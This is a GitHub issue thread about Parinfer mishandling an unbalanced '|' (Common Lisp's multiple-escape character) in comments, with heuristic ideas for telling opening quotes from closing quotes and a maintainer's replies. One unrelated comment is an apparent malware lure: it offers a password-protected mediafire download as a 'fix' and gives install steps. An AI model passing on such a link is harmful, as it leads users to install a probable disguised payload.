Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

"Dangerous quotes" extend to |? #213

Open
gilch opened this issue Aug 26, 2024 · 3 comments
Open

"Dangerous quotes" extend to |? #213

gilch opened this issue Aug 26, 2024 · 3 comments

Comments

@gilch
Copy link

gilch commented Aug 26, 2024

Unbalanced | inside a comment:

;; |
(defun foo (
  2

Maybe similar to the "dangerous quotes" problem with an unbalanced " in a comment, but I think this one could come up more often.

If so, it should at least be documented along with ".

The documentation on dangerous quotes suggests that this wouldn't be an issue if we could tell start quotes from end quotes. Not 100% reliable, but usually, you can tell if a " starts or ends a string by the immediately surrounding characters. A (" or " probably starts a string, while a ") or " probably ends it. On the other hand, | can occur inside of symbols, so it's not as easy, but again, they're usually on the outside, so a (| or | probably starts a symbol, while a |) or | probably ends it. You could tally the whole file and see if most of the quotes you think are start quotes look like start quotes and if most of the end quotes look like end quotes. If it's the reverse, you're probably in a temporary inverted situation. Another heuristic might be the relative length of code vs strings.

Maybe most of the time you could get buy on these heuristics, but in cases where certainty isn't as high, you could fall back to the current behavior. The user needs to know why this is happening though.

Is it possible for Parinfer to at least report the location of the dangerous " or | so the editor can highlight it? (Or does it do this already?) The Spacemacs Parinfer layer, at least, doesn't handle this very well. It just mysteriously stops working, maybe with a cryptic #<user-ptr... message that's easy to miss.

It would also be nice if there was a way to turn Parinfer off for just a section of the code. Something like a ;; Parinfer: off and ;; Parinfer: on pair. This would make it easier for the user to find problems with a binary search approach. It would also allow a dangerous " or | if the user super needs it for some reason without giving up on Parinfer for the whole file. A ;; Parinfer: skip above a top-level form could also help. It might be easier to implement.

@deverchettychandrashekar

to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

@shaunlebron
Copy link
Collaborator

  1. Definitions: What is | and what language is this for?
  2. Heuristics for directionality: I wouldn’t know how to calculate the heuristic’s "certainty".
  3. Letting the user know: The API returns an error object with location information (see readme).
  4. Selective disabling: I’d probably implement this as a preprocessor allowing on/off but not skip.

@gilch
Copy link
Author

gilch commented Sep 6, 2024

If parinfer.js doesn't have a mode or configuration for Common Lisp yet, then this is a downstream problem I'm seeing in Spacemacs. Could be in parinfer-rust-emacs or parinfer-rust-mode. This could still come up here for similar reasons if you later add Common Lisp support.

  1. I'm talking about Common Lisp specifically. | is the (default) multiple escape character, which is similar to putting a backslash before each character in a symbol that's between the || pair (i.e. foo|bar|baz is like saying foo\b\a\rbaz). Symbols can contain whitespace, ;, (, and ) this way. This means that handling probably needs to be similar to "" pairs, but e.g. foo|bar|baz should parse as one (symbol) atom, unlike foo"bar"baz, which is three (symbol string symbol). I care because of another Lisp (my Lissp/Hissp project), which is supposed to be mostly syntactically compatible with Common Lisp editors. Python users are a major audience, and a Lisp would be an easier sell if they can code using indents like they're used to in Python via Parinfer.
  2. I'm not sure how well these ideas would work in practice. The certainty level would be by counting instances over the remainder of the file (below the edit location), rather than for any one instance. For well-formed code, the odd-numbered " characters (not otherwise escaped), starting with the first, are open quotes. The even numbered are closing quotes. They'll mostly heuristically look like open and close quotes as well. In a dangerous quote situation, they can invert. See example below.
  3. This seems to be a downstream problem then: Need better user feedback for "dangerous quote" situation justinbarclay/parinfer-rust-mode#103 But it might depend on what information is in the error.
  4. I suggested skip because I thought it might be easier to implement, not better. This is fine. Allowing a skip comment above an inner form in addition to the pair could be convenient, but doesn't add all that much.

Example based on https://shaunlebron.github.io/parinfer/#inserting-quotes

;; User just inserted a quote character and Parinfer is about to cycle.
"┃

(def string ")))))") ;; <-- at risk!

"string"
"Another string."
;; " dangerous quote in a comment

Heuristically, based only on the immediately surrounding characters, the odds should be opening:
1 - \n"\n indeterminate
3 - )") closing
5 - g"\n closing
7 - ."\n closing
Notice they're all backwards.

The evens should be closing:
2 - ") indeterminate
4 - \n"s opening
6 - \n"A opening
8 - " indeterminate
Notice they're all backwards too.

Compare that count to just before the user's edit (previous cycle), and we can heuristically guess we're in an inverted string situation. This would be less obvious with fewer of the heuristically-correct strings below the edit, but above the dangerous quote.

Maybe there are other cases I haven't accounted for.

What should parinfer do in this situation? Maybe a separate question from the heuristics. I think inserting a " just after the edit location (after their cursor) is the most conservative change. The user can see it immediately, and it's not going to corrupt anything far away. They were probably going to type it anyway. A lot of editors automatically insert balanced pairs like this, or have an option to do it. That should be turned off for brackets handled by Parinfer, but maybe Parinfer should balance the " character like that. I can see it getting annoying in some cases, but corrupting code elsewhere is worse.

If the user really wants to invert a string, they can cut/paste into the balanced pair or something.

@github-staff github-staff deleted a comment from masooddahmedd Sep 10, 2024
@gilch
Copy link
Author

gilch commented Nov 19, 2024

I'm not sure my suggested heuristics here are workable. Even when they work, they might not help that much.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Projects
None yet
Development

No branches or pull requests

6 participants
@shaunlebron @gilch @deverchettychandrashekar and others